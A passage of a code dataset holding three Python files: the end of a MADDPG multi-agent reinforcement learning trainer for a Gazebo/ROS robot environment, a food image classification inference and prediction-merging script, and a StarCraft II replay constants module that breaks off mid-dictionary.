action_batch.view(self.batch_size, -1)\n self.critic_optimizer[agent].zero_grad()\n current_Q = self.critics[agent](whole_state, whole_action, whole_laser)\n\n # n_agents x batch_size_non_final x next_action\n non_final_next_actions = [self.actors_target[i](non_final_next_states[:, i, :], non_final_next_lasers[:, i, :]) for i in range(self.n_agents)]\n non_final_next_actions = torch.stack(non_final_next_actions)\n\n # batch_size_non_final x n_agents x next_action\n non_final_next_actions = (non_final_next_actions.transpose(0, 1).contiguous())\n\n target_Q = torch.zeros(self.batch_size).type(FloatTensor)\n target_Q[non_final_mask] = self.critics_target[agent](\n non_final_next_states.view(-1, self.n_agents * self.n_states),\n non_final_next_actions.view(-1, self.n_agents * self.n_actions),\n non_final_next_lasers.view(-1, self.n_agents * self.n_laser)\n ).squeeze()\n\n # TD Target = r + gamma * target_Q\n # TD Target shape : batch_size x 1 (agent)\n target_Q = (target_Q.unsqueeze(1) * self.GAMMA) + (reward_batch[:, agent].unsqueeze(1))\n\n # Update Critic Network\n loss_Q = nn.MSELoss()(current_Q, target_Q.detach())\n loss_Q.backward()\n self.critic_optimizer[agent].step()\n\n # Update Actor Network\n self.actor_optimizer[agent].zero_grad()\n state_i = state_batch[:, agent, :]\n laser_i = laser_batch[:, agent, :]\n action_i = self.actors[agent](state_i, laser_i)\n ac = action_batch.clone()\n ac[:, agent, :] = action_i\n whole_action = ac.view(self.batch_size, -1)\n\n # check replace true action(from buffer) to each agent's policy from obs --> make whole action from self.actor[agent](state_batch[:, agent, :])\n actor_loss = -self.critics[agent](whole_state, whole_action, whole_laser).mean()\n \n # check performance\n # actor_loss += (action_i ** 2).mean() * 1e-3 # from openai reference code\n\n actor_loss.backward()\n 
self.actor_optimizer[agent].step()\n\n c_loss.append(loss_Q)\n a_loss.append(actor_loss)\n\n if self.steps_done % 100 == 0 and self.steps_done > 0:\n for i in range(self.n_agents):\n soft_update(self.critics_target[i], self.critics[i], self.tau)\n soft_update(self.actors_target[i], self.actors[i], self.tau)\n\n return c_loss, a_loss\n\n def select_action(self, state_batch, laser_batch):\n # state_batch: n_agents x state_dim\n actions = torch.zeros(\n self.n_agents,\n self.n_actions)\n FloatTensor = torch.cuda.FloatTensor if self.use_cuda else torch.FloatTensor\n for i in range(self.n_agents):\n sb = state_batch[i, :].detach()\n lb = laser_batch[i, :].detach()\n act = self.actors[i](sb.unsqueeze(0), lb.unsqueeze(0)).squeeze()\n\n act += torch.from_numpy(\n np.random.randn(self.n_actions) * self.var[i]).type(FloatTensor)\n\n if self.episode_done > self.episodes_before_train and self.var[i] > 0.05:\n self.var[i] *= 0.999998\n act = torch.clamp(act, -1.0, 1.0)\n\n actions[i, :] = act\n self.steps_done += 1\n\n return actions\n##############################################################################################################\n# MADDPG Replay Buffer\nExperience = namedtuple('Experience',\n ('states', 'laser', 'actions', 'next_states', 'next_laser', 'rewards'))\n\nclass ReplayMemory:\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Experience(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n##############################################################################################################\n# MADDPG Model\nclass Critic(nn.Module):\n def __init__(self, n_agent, dim_observation, dim_action, laser_cnt, hidden_layer=128, second_hidden_layer=64):\n super(Critic, self).__init__()\n self.n_agent = n_agent\n self.dim_observation = dim_observation\n self.dim_action = dim_action\n obs_dim = dim_observation * n_agent\n act_dim = self.dim_action * n_agent\n las_dim = laser_cnt * n_agent\n\n self.PreFC = nn.Linear(las_dim, 10)\n self.FC1 = nn.Linear(obs_dim + 10 + act_dim, hidden_layer)\n self.FC2 = nn.Linear(hidden_layer, second_hidden_layer)\n self.FC3 = nn.Linear(second_hidden_layer, 1)\n\n # self.PreFC = nn.Linear(las_dim, 10)\n # self.FC1 = nn.Linear(obs_dim + 10, hidden_layer)\n # self.FC2 = nn.Linear(hidden_layer+act_dim, second_hidden_layer)\n # self.FC3 = nn.Linear(second_hidden_layer, 1)\n\n # obs: batch_size * obs_dim\n def forward(self, obs, acts, laser):\n result = F.relu(self.PreFC(laser))\n combined = torch.cat([result, obs, acts], 1)\n result = F.relu(self.FC1(combined))\n result = F.relu(self.FC2(result))\n\n # result = F.relu(self.PreFC(laser))\n # combined = torch.cat([result, obs], 1)\n # result = F.relu(self.FC1(combined))\n # combined = torch.cat([result, acts], 1)\n # result = F.relu(self.FC2(combined))\n\n return self.FC3(result)\n\n\nclass Actor(nn.Module):\n def __init__(self, dim_observation, dim_action, laser_cnt, hidden_layer=128, second_hidden_layer=64):\n super(Actor, self).__init__()\n self.PreFC = nn.Linear(laser_cnt, 10)\n self.FC1 = nn.Linear(dim_observation + 10, hidden_layer)\n self.FC2 = nn.Linear(hidden_layer, second_hidden_layer)\n self.FC3 = nn.Linear(second_hidden_layer, dim_action)\n\n def forward(self, obs, laser):\n result = 
F.relu(self.PreFC(laser))\n combined = torch.cat([result, obs], 1)\n result = F.relu(self.FC1(combined))\n result = F.relu(self.FC2(result))\n result = torch.tanh(self.FC3(result)) * 0.5\n return result\n\n##################################################################################\n\ndef main():\n env = Gazebo_Env(config.n_agents, config.n_targets, config.dim_laser)\n reward_record = []\n\n print_interval = 10\n score = 0\n\n maddpg = MADDPG(config.n_agents, config.dim_obs, config.dim_act, config.dim_laser, config.batch_size, config.first_hidden_layer, config.second_hidden_layer, \n config.capacity, config.episodes_before_train, config.gamma, config.tau, config.lr_cr, config.lr_ac)\n\n if (args.model_path != None):\n file_list = os.listdir(args.model_path)\n\n max_index = 0\n max_value = 0\n for idx in range(len(file_list)):\n if(Utils.isint(file_list[idx][5:-4])):\n if(max_value < int(file_list[idx][5:-4])):\n max_index = idx\n max_value = int(file_list[idx][5:-4])\n last_file = file_list[max_index]\n\n path = args.model_path + '/' + last_file\n print(path)\n\n checkpoint = torch.load(path)\n start_epi = checkpoint['n_epi']\n # start_epi = 0\n for a, aopt, params, opt in zip(maddpg.actors, maddpg.actor_optimizer, checkpoint['actor_params'], checkpoint['actor_optim']):\n a.load_state_dict(params)\n aopt.load_state_dict(opt)\n for a, aopt, params, opt in zip(maddpg.critics, maddpg.critic_optimizer, checkpoint['critic_params'], checkpoint['critic_optim']):\n a.load_state_dict(params)\n aopt.load_state_dict(opt)\n else:\n start_epi = config.start_epi\n\n # tensorboard --logdir=runs\n writer = SummaryWriter()\n rate = rospy.Rate(20)\n\n time.sleep(3)\n print(\"Start Training\")\n\n FloatTensor = torch.cuda.FloatTensor if maddpg.use_cuda else torch.FloatTensor\n for i_episode in range(start_epi, config.n_episode):\n obs, laser = env.reset()\n if isinstance(obs, np.ndarray):\n obs = torch.from_numpy(obs).float()\n if isinstance(laser, np.ndarray):\n laser = torch.from_numpy(laser).float()\n\n total_reward = 0.0\n n_step = 0\n\n past_obs_list = []\n past_laser_list= []\n past_action_list = []\n \n done = False\n rr = np.zeros((config.n_agents,))\n\n while not done:\n n_step += 1\n obs = obs.type(FloatTensor)\n laser = laser.type(FloatTensor)\n action = maddpg.select_action(obs, laser).data.cpu()\n obs_, laser_, done, reward, _ = env.step(action.numpy().tolist())\n\n reward = torch.FloatTensor(reward).type(FloatTensor)\n obs_ = torch.from_numpy(obs_).float()\n laser_ = torch.from_numpy(laser_).float()\n\n if done:\n next_obs = None\n next_laser = None\n else:\n next_obs = obs_\n next_laser = laser_\n\n total_reward += reward.sum()\n rr += reward.cpu().numpy()\n\n if (n_step < config.delay_step):\n past_obs_list.append(obs.data)\n past_laser_list.append(laser.data)\n past_action_list.append(action)\n else:\n maddpg.memory.push(past_obs_list.pop(0), past_laser_list.pop(0), past_action_list.pop(0), next_obs, next_laser, reward)\n past_obs_list.append(obs.data)\n past_laser_list.append(laser.data)\n past_action_list.append(action)\n\n obs = next_obs\n laser = next_laser\n\n if (args.test == False):\n c_loss, a_loss = maddpg.update_policy()\n rate.sleep()\n\n score += total_reward\n maddpg.episode_done += 1\n reward_record.append(total_reward)\n\n writer.add_scalar(\"Reward function\", total_reward, i_episode)\n print(\"Reward : \" + str(total_reward))\n print(\" \")\n\n if i_episode == 0:\n model_path = os.path.join(\"/home/dwkim/RL_ws/src/rl/src\", Utils.Save_path)\n if not 
os.path.isdir(model_path):\n os.makedirs(model_path)\n \n with open(model_path + '/config.json', 'w') as f:\n json.dump(vars(config), f)\n\n if i_episode % print_interval == 0 and i_episode != 0:\n avg_score_str = str(int(score/print_interval))\n ckpt_path = os.path.join(model_path, 'ckpt_'+ avg_score_str + '.pth')\n\n torch.save(\n {\n 'n_epi' : i_episode,\n 'actor_params' : [a.state_dict() for a in maddpg.actors],\n 'critic_params' : [a.state_dict() for a in maddpg.critics],\n 'actor_optim' : [a.state_dict() for a in maddpg.actor_optimizer],\n 'critic_optim' : [a.state_dict() for a in maddpg.critic_optimizer],\n }, ckpt_path)\n\n print(\"# of episode :{}, avg score : {:.1f}\".format(i_episode, score/print_interval))\n score = 0.0\n \nif __name__ == '__main__':\n main()","sub_path":"Main_MADDPG.py","file_name":"Main_MADDPG.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
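soft_update is imported from Train_Utils and invoked every 100 steps above to track the target networks. A minimal sketch of what a Polyak soft update conventionally does (this is an assumption about the helper's behaviour, not its actual source):

import torch
import torch.nn as nn

def soft_update(target: nn.Module, source: nn.Module, tau: float) -> None:
    # theta_target <- tau * theta_source + (1 - tau) * theta_target
    with torch.no_grad():
        for t_param, s_param in zip(target.parameters(), source.parameters()):
            t_param.mul_(1.0 - tau).add_(tau * s_param)

actor = nn.Linear(4, 2)
actor_target = nn.Linear(4, 2)
soft_update(actor_target, actor, tau=0.01)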
+{"seq_id":"100893437","text":"#coding=utf-8\nimport os\nimport sys\n\nos.environ['CUDA_DEVICE_ORDRE'] = 'PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1,2,3,4,5,6,7'\n\nimport json\nimport csv\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom math import ceil\nfrom tqdm import tqdm\nimport pickle\nimport shutil\nimport collections\nfrom sklearn.metrics.pairwise import cosine_similarity, paired_distances\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import CrossEntropyLoss\nfrom torchvision import datasets, models\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nfrom transforms import transforms\nfrom models.LoadModel import MainModel\nfrom utils.dataset_DCL import collate_fn4cvpr, dataset\nfrom config import LoadConfig, load_data_transformers\nfrom utils.test_tool import set_text, save_multi_img, cls_base_acc\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='dcl parameters')\n parser.add_argument('--data', dest='dataset', default='food', type=str)\n parser.add_argument('--backbone',\n dest='backbone',\n default='dm_nfnet_f3',\n type=str)\n parser.add_argument('--b', dest='batch_size', default=104, type=int)\n parser.add_argument('--nw', dest='num_workers', default=32, type=int)\n parser.add_argument('--ver', dest='version', default='test', type=str)\n parser.add_argument(\n '--save',\n dest='resume',\n default='./net_model/_83113_food/weights_5_2316_0.9885_0.9964.pth',\n type=str)\n parser.add_argument('--size',\n dest='resize_resolution',\n default=438,\n type=int)\n parser.add_argument('--crop',\n dest='crop_resolution',\n default=384,\n type=int)\n parser.add_argument('--ss', dest='save_suffix', default=None, type=str)\n parser.add_argument('--acc_report',\n dest='acc_report',\n default=True,\n type=bool)\n parser.add_argument('--swap_num',\n default=[7, 7],\n nargs=2,\n metavar=('swap1', 'swap2'),\n type=int,\n help='specify a range')\n args = parser.parse_args()\n return args\n\n\ndef merge_crop_files(file_list):\n for ind, file in enumerate(file_list):\n out_name = file.replace('crop_', '')\n if os.path.exists(out_name):\n continue\n probs = {}\n headers = ['id', 'probs']\n rows = []\n if 'crop_merge' in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n values = eval(row.probs)\n if img not in probs:\n probs[img] = {\n key: [value]\n for key, value in values.items()\n }\n else:\n for key, value in values.items():\n if key not in probs[img]:\n probs[img][key] = [value]\n else:\n probs[img][key].append(value)\n\n for img, values in probs.items():\n for key, value in values.items():\n probs[img][key] = sum(value) / len(value)\n probs[img] = sorted(probs[img].items(),\n key=lambda a: a[1],\n reverse=True)[:10]\n rows.append((img, {k: round(v, 8) for k, v in probs[img]}))\n with open(out_name, 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n\n\ndef merge_models_results(file_list):\n headers = ['id', 'predicted']\n rows = []\n probs = collections.OrderedDict()\n for ind, file in enumerate(file_list):\n if 'vit' in file:\n rate = 1\n else:\n rate = 1\n\n if \"submission_\" in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n if img not in probs:\n probs[img] = {\n row.predict_1: [row.confid_1 * rate],\n 
row.predict_2: [row.confid_2 * rate],\n row.predict_3: [row.confid_3 * rate]\n }\n\n else:\n for key, value in [(row.predict_1, row.confid_1),\n (row.predict_2, row.confid_2),\n (row.predict_3, row.confid_3)]:\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n\n elif \"swin_\" in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n if img not in probs:\n probs[img] = {\n row.top1_cls: [row.top1_prob * rate],\n row.top2_cls: [row.top2_prob * rate],\n row.top3_cls: [row.top3_prob * rate],\n row.top4_cls: [row.top4_prob * rate],\n row.top5_cls: [row.top5_prob * rate]\n }\n\n else:\n for key, value in [(row.top1_cls, row.top1_prob),\n (row.top2_cls, row.top2_prob),\n (row.top3_cls, row.top3_prob),\n (row.top4_cls, row.top4_prob),\n (row.top5_cls, row.top5_prob)]:\n\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n else:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n values = eval(row.probs)\n if img not in probs:\n probs[img] = {\n key: [value * rate]\n for key, value in values.items()\n }\n else:\n for key, value in values.items():\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n for img, values in probs.items():\n for key, value in values.items():\n probs[img][key] = sum(value) #/ len(value)\n probs[img] = sorted(probs[img].items(), key=lambda a: a[1])[-1][0]\n rows.append((img, probs[img]))\n with open('output/final.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n\n\ndef get_emb_avg_result(name, sub_cat, embed, dis='euclidean'):\n distance = []\n embeds = []\n for cat in sub_cat:\n class_dir = os.path.join('output/val', str(cat).zfill(5))\n class_embeds = np.array([\n np.load(os.path.join(class_dir, file))\n for file in os.listdir(class_dir)\n ])\n embeds.append(class_embeds.mean(axis=0))\n\n distance = paired_distances(np.array([embed] * len(sub_cat)),\n np.array(embeds),\n metric=dis)\n label = sub_cat[distance.argmin()]\n return label\n\n\ndef get_test_labeled_data(\n csv_file, test_dir='/data3/zengpeng/products/food/classify/Test_new'):\n data = pd.read_csv(csv_file)\n for index, row in data.iterrows():\n img = row.id\n label = row.predicted\n dst_dir = os.path.join(os.path.dirname(test_dir), 'Test', str(label))\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n shutil.copy(os.path.join(test_dir, img), dst_dir)\n\n\ndef get_clean_label_by_mul_model(file_list,\n source_dir='/data/zengpeng/products',\n image_save=''):\n rows = []\n probs = collections.OrderedDict()\n number = len(file_list)\n for ind, file in enumerate(file_list):\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d' % (ind, index))\n img = row.id\n label = row.predicted\n if img not in probs:\n probs[img] = [label]\n else:\n probs[img].append(label)\n ret = []\n for img, labels in probs.items():\n image_id = os.path.basename(img)\n class_id = img.split('/')[1]\n if len(set(labels)) == 1 and class_id == str(labels[0]):\n ret.append({\"class_id\": str(labels[0]), \"image_id\": image_id})\n if image_save:\n save_dir = os.path.join(image_save, class_id)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n 
shutil.copy(os.path.join(source_dir, img), save_dir)\n ret = json.dumps({'images': ret}, indent=4)\n with open('output/train_clean_v1.json', 'w', encoding='utf-8') as f:\n f.write(ret)\n\n\nif __name__ == '__main__':\n get_test_data = False\n merge_result = True\n ten_crop = True\n if get_test_data:\n csv_file = 'output/final.csv'\n get_test_labeled_data(csv_file)\n exit(0)\n if merge_result:\n file_list = [\n os.path.join('./output', file) for file in os.listdir('./output')\n if file.endswith('merge.csv')\n ]\n merge_crop_files(file_list)\n file_list = set([file.replace('crop_', '') for file in file_list])\n merge_models_results(file_list)\n exit(0)\n args = parse_args()\n use_gpu = True if torch.cuda.is_available() else False\n print(args)\n Config = LoadConfig(args, args.version)\n transformers = load_data_transformers(args.resize_resolution,\n args.crop_resolution, args.swap_num)\n data_set = dataset(Config,\n anno=Config.test_anno,\n swap=transformers[\"None\"],\n totensor=transformers['test_totensor']\n if ten_crop else transformers['val_totensor'],\n test=True)\n\n #for data in data_set:\n # print(data)\n\n dataloader = torch.utils.data.DataLoader(data_set,\\\n batch_size=args.batch_size,\\\n shuffle=False,\\\n num_workers=args.num_workers,\\\n collate_fn=collate_fn4cvpr)\n\n setattr(dataloader, 'total_item_len', len(data_set))\n\n cudnn.benchmark = True\n\n model = MainModel(Config)\n model_dict = model.state_dict()\n if use_gpu:\n pretrained_dict = torch.load(args.resume)\n else:\n pretrained_dict = torch.load(args.resume, map_location='cpu')\n pretrained_dict = {\n k[7:]: v\n for k, v in pretrained_dict.items() if k[7:] in model_dict\n }\n print(\n f'model_dict: {len(model_dict)}, pretrained_dict: {len(pretrained_dict)}'\n )\n model_dict.update(pretrained_dict)\n model.load_state_dict(model_dict)\n if use_gpu:\n model.cuda()\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n\n headers = ['id', 'predicted']\n headers_merge = ['id', 'probs']\n rows = []\n rows_merge = []\n if not ten_crop:\n csv_name = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \".csv\"\n csv_name_merge = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_merge.csv\"\n else:\n csv_name = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_crop.csv\"\n csv_name_merge = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_crop_merge.csv\"\n\n model.train(False)\n softmax = nn.Softmax(dim=1)\n\n with torch.no_grad():\n count_bar = tqdm(total=dataloader.__len__())\n for batch_cnt_val, data_val in enumerate(dataloader):\n count_bar.update(1)\n inputs, img_name = data_val\n if use_gpu:\n inputs = Variable(inputs.cuda())\n else:\n inputs = Variable(inputs)\n\n if ten_crop:\n bs, ncrops, c, h, w = inputs.size()\n inputs = inputs.view(-1, c, h, w)\n img_name = [val for val in img_name for i in range(5)]\n\n outputs = model(inputs)\n if Config.use_dcl:\n outputs_pred = outputs[0] + outputs[\n 1][:, 0:Config.numcls] + outputs[1][:, Config.numcls:2 *\n Config.numcls]\n else:\n outputs_pred = outputs[0]\n\n top10_val, top10_pos = torch.topk(softmax(outputs_pred), 10)\n for sub_name, sub_cat, value, pred in zip(img_name,\n top10_pos.tolist(),\n top10_val.tolist(),\n outputs_pred):\n #### Classify by the distance between pred and the averaged validation-set embeddings\n #sub_cat_avg = get_emb_avg_result(sub_name, sub_cat, pred.cpu().numpy())\n #rows.append((os.path.basename(sub_name), sub_cat_avg))\n\n #### softmax classification\n rows.append((os.path.basename(sub_name), sub_cat[0]))\n\n rows_merge.append(\n (os.path.basename(sub_name),\n {k: round(v, 8)\n for k, v in zip(sub_cat, value)}))\n with open(csv_name, 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n with open(csv_name_merge, 'w', encoding='utf-8',\n newline='') as f_merge:\n writer_merge = csv.writer(f_merge)\n writer_merge.writerow(headers_merge)\n writer_merge.writerows(rows_merge)\n count_bar.close()\n","sub_path":"test_cvpr.py","file_name":"test_cvpr.py","file_ext":"py","file_size_in_byte":14981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
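merge_crop_files above boils down to pooling the per-crop class-to-probability dicts for each image, averaging them, and keeping the top classes. A compact, self-contained sketch of that averaging step with made-up rows:

from collections import defaultdict

crop_rows = [
    ('img1.jpg', {'cat': 0.9, 'dog': 0.1}),   # crop 1
    ('img1.jpg', {'cat': 0.7, 'dog': 0.3}),   # crop 2
]

pooled = defaultdict(lambda: defaultdict(list))
for img, probs in crop_rows:
    for cls, p in probs.items():
        pooled[img][cls].append(p)

merged = {
    img: sorted(((c, sum(v) / len(v)) for c, v in cls_probs.items()),
                key=lambda kv: kv[1], reverse=True)
    for img, cls_probs in pooled.items()
}
print(merged['img1.jpg'])  # [('cat', 0.8), ('dog', 0.2)] up to float rounding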
+{"seq_id":"432342858","text":"# -*- coding: utf-8 -*-\n\n# These are found in Repack-MPQ/fileset.{locale}#Mods#Core.SC2Mod#{locale}.SC2Data/LocalizedData/Editor/EditorCategoryStrings.txt\n# EDSTR_CATEGORY_Race\n# EDSTR_PLAYERPROPS_RACE\n# The ??? means that I don't know what language it is.\n# If multiple languages use the same set they should be comma separated\nLOCALIZED_RACES = {\n\n # enUS\n 'Terran': 'Terran',\n 'Protoss': 'Protoss',\n 'Zerg': 'Zerg',\n\n # ruRU\n 'Терран': 'Terran',\n 'Протосс': 'Protoss',\n 'Зерг': 'Zerg',\n\n # koKR\n '테란': 'Terran',\n '프로토스': 'Protoss',\n '저그': 'Zerg',\n\n # ??eu\n 'Terranie': 'Terran',\n 'Protosi': 'Protoss',\n 'Zergi': 'Zerg',\n\n # zhCH\n '人类': 'Terran',\n '星灵': 'Protoss',\n '异虫': 'Zerg',\n\n # zhTW\n '人類': 'Terran',\n '神族': 'Protoss',\n '蟲族': 'Zerg',\n\n # ???\n 'Terrano': 'Terran',\n\n # deDE\n 'Terraner': 'Terran',\n\n # esES - Spanish\n # esMX - Latin American\n # frFR - French - France\n # plPL - Polish Polish\n # ptBR - Brazilian Portuguese\n}\n\n#\n# Codes as found in bytestream\n#\n\nRACE_CODES = {\n 'Terr': 'Terran',\n 'Zerg': 'Zerg',\n 'Prot': 'Protoss',\n 'RAND': 'Random',\n}\nMESSAGE_CODES = {\n '0': 'All',\n '2': 'Allies',\n '128': 'Header',\n '125': 'Ping',\n}\nTEAM_COLOR_CODES = {\n 'tc01': \"Red\",\n 'tc02': \"Blue\",\n 'tc03': \"Teal\",\n 'tc04': \"Purple\",\n 'tc05': \"Yellow\",\n 'tc06': \"Orange\",\n 'tc07': \"Green\",\n 'tc08': \"Light Pink\",\n 'tc09': \"Violet\",\n 'tc10': \"Light Grey\",\n 'tc11': \"Dark Green\",\n 'tc12': \"Brown\",\n 'tc13': \"Light Green\",\n 'tc14': \"Dark Grey\",\n 'tc15': \"Pink\",\n 'tc16': \"??\",\n}\nDIFFICULTY_CODES = {\n 'VyEy': 'Very easy',\n 'Easy': 'Easy',\n 'Medi': 'Medium',\n 'Hard': 'Hard',\n 'VyHd': 'Very hard',\n 'Insa': 'Insane',\n}\nGAME_TYPE_CODES = {\n 'Priv': 'Private',\n 'Pub': 'Public',\n 'Amm': 'Ladder',\n '': 'Single',\n}\n# (name, key for team ids)\nGAME_FORMAT_CODES = {\n '1v1': '1v1',\n '2v2': '2v2',\n '3v3': '3v3',\n '4v4': '4v4',\n '5v5': '5v5',\n '6v6': '6v6',\n 'FFA': 'FFA',\n}\nGAME_SPEED_CODES = {\n 'Slor': 'Slower',\n 'Slow': 'Slow',\n 'Norm': 'Normal',\n 'Fast': 'Fast',\n 'Fasr': 'Faster',\n}\n\nGAME_SPEED_FACTOR = {\n 'Slower': 0.6,\n 'Slow': 0.8,\n 'Normal': 1.0,\n 'Fast': 1.2,\n 'Faster': 1.4\n}\n\nPLAYER_TYPE_CODES = {\n 'Humn': 'Human',\n 'Comp': 'Computer',\n 'Open': 'Open',\n 'Clsd': 'Closed',\n}\nGATEWAY_CODES = {\n 'US': 'Americas',\n 'KR': 'Asia',\n 'EU': 'Europe',\n 'SG': 'South East Asia',\n 'XX': 'Public Test',\n}\nCOLOR_CODES = {\n 'B4141E': 'Red',\n '0042FF': 'Blue',\n '1CA7EA': 'Teal',\n 'EBE129': 'Yellow',\n '540081': 'Purple',\n 'FE8A0E': 'Orange',\n '168000': 'Green',\n 'CCA6FC': 'Light pink',\n '1F01C9': 'Violet',\n '525494': 'Light grey',\n '106246': 'Dark green',\n '4E2A04': 'Brown',\n '96FF91': 'Light green',\n '232323': 'Dark grey',\n 'E55BB0': 'Pink'\n}\n\nCOLOR_CODES_INV = dict(zip(COLOR_CODES.values(),COLOR_CODES.keys()))\n\n## Names of the different properties found in the s2gs files lobby part\nLOBBY_PROPERTY_NAMES = {\n 1 : 'unknown1', #0001/0002\n 2 : 'unknown2', #0001/0002\n 500 : 'Slot type', #Clsd/Open/Humn/Comp\n 1000 : 'unknown3', #Dflt\n 1001 : 'Melee', #no/yes no->2000, yes->2001\n 2000 : 'Custom mode', #t2/t3/t4/t5/FFA/Cust (tX = X teams)\n 2001 : 'Melee mode', #1v1/2v2/3v3/4v4/5v5/6v6/FFA\n 2002 : '1v1 Team', #T1/T2\n 2003 : '2v2 Team', #T1/T2/T1/T2\n 2004 : '3v3 Team', #T1/T2/T1/T2/T1/T2\n 2005 : '4v4 Team', #T1/T2/T1/T2/T1/T2/T1/T2\n 2006 : 'FFA Team', #T1/T2/T3/T4/T5/T6\n 2007 : '5v5 Team', #T1/T2/T1/T2/T1/T2/T1/T2/T1/T2\n 
2008 : '6v6 Team', #T1/T2/T1/T2/T1/T2/T1/T2/T1/T2/T1/T2\n 2011 : \"'2 Teams' team\", #(T1/T2)*6\n 2012 : \"'3 Teams' team\", #(T1/T2/T3)*6\n 2013 : \"'4 Teams' team\", #(T1/T2/T3/T4)*6\n 2014 : \"'5 Teams' team\", #(T1/T2/T3/T4/T5)*6\n 2017 : \"FFA Team\", #T1/T2/T3/T4/T5/T6\n 2018 : \"'Custom' team\", #(T1/T2/T3/T4/T5/T6)*5\n 3000 : 'Game speed', #Slor/Slow/Norm/Fast/Fasr\n 3001 : 'Race', #Terr/Zerg/Prot/RAND\n 3002 : 'Color', #tc01/tc02/tc03/tc04/.../tc15\n 3003 : 'Handicap', #50/60/70/80/90/100\n 3004 : 'Difficulty', #VyEy/Easy/Medi/Hard/VyHd/Insa\n 3006 : 'Game countdown', #3/5/7/10/15/20/25/30 (countdown timer in lobby (seconds))\n 3007 : 'Player mode', #Part/Watch (Participating/Watching) Watch->3008\n 3008 : 'Spectate mode', #Obs/Ref\n 3009 : 'Lobby type', #Priv/Pub/Amm\n 3010 : 'unknown4', #no/yes (Never required)\n}\n\nBUILD_ORDER_UPGRADES = {\n # Protoss\n\n ## Forge\n 0x2902 : 'Protoss Ground Weapons Level 1',\n 0x2a02 : 'Protoss Ground Weapons Level 2',\n 0x2b02 : 'Protoss Ground Weapons Level 3',\n 0x2c02 : 'Protoss Ground Armor Level 1',\n 0x2d02 : 'Protoss Ground Armor Level 2',\n 0x2e02 : 'Protoss Ground Armor Level 3',\n 0x2f02 : 'Protoss Shields Level 1',\n 0x3002 : 'Protoss Shields Level 2',\n 0x3102 : 'Protoss Shields Level 3',\n ## Robo bay\n 0x3202 : 'Gravitic Boosters',\n 0x3302 : 'Gravitic Drive',\n 0x3402 : 'Extended Thermal Lance',\n ## Cyber core\n 0x5002 : 'Protoss Air Weapons Level 1',\n 0x5102 : 'Protoss Air Weapons Level 2',\n 0x5202 : 'Protoss Air Weapons Level 3',\n 0x5302 : 'Protoss Air Armor Level 1',\n 0x5402 : 'Protoss Air Armor Level 2',\n 0x5502 : 'Protoss Air Armor Level 3',\n 0x5602 : 'Warp Gate Research',\n 0x5702 : 'Hallucination',\n ## Twilight\n 0x5802 : 'Charge',\n 0x5902 : 'Blink',\n ## Fleet Beacon\n 0x0302 : 'Graviton Catapult',\n 0x7102 : 'Anion Pulse-Crystals',\n\n #Zerg\n\n ## Roach Warren\n 0x0402 : 'Glial Reconstitution',\n 0x0502 : 'Tunneling Claws',\n ## Ultralisk Cavern\n 0x0602 : 'Chitinous Plating',\n ## Evo. chamber\n 0x3702 : 'Zerg Melee Attacks Level 1',\n 0x3802 : 'Zerg Melee Attacks Level 2',\n 0x3902 : 'Zerg Melee Attacks Level 3',\n 0x3a02 : 'Zerg Ground Carapace Level 1',\n 0x3b02 : 'Zerg Ground Carapace Level 2',\n 0x3c02 : 'Zerg Ground Carapace Level 3',\n 0x3d02 : 'Zerg Missile Attacks Level 1',\n 0x3e02 : 'Zerg Missile Attacks Level 2',\n 0x3f02 : 'Zerg Missile Attacks Level 3',\n ## Lair\n 0x4002 : 'Pneumatized Carapace',\n 0x4102 : 'Ventral Sacs',\n 0x4202 : 'Burrow',\n ## Pool\n 0x4302 : 'Adrenal Glands',\n 0x4402 : 'Metabolic Boost',\n ## Hydra den\n 0x4502 : 'Grooved Spines',\n ## Spire\n 0x4602 : 'Zerg Flyer Attacks Level 1',\n 0x4702 : 'Zerg Flyer 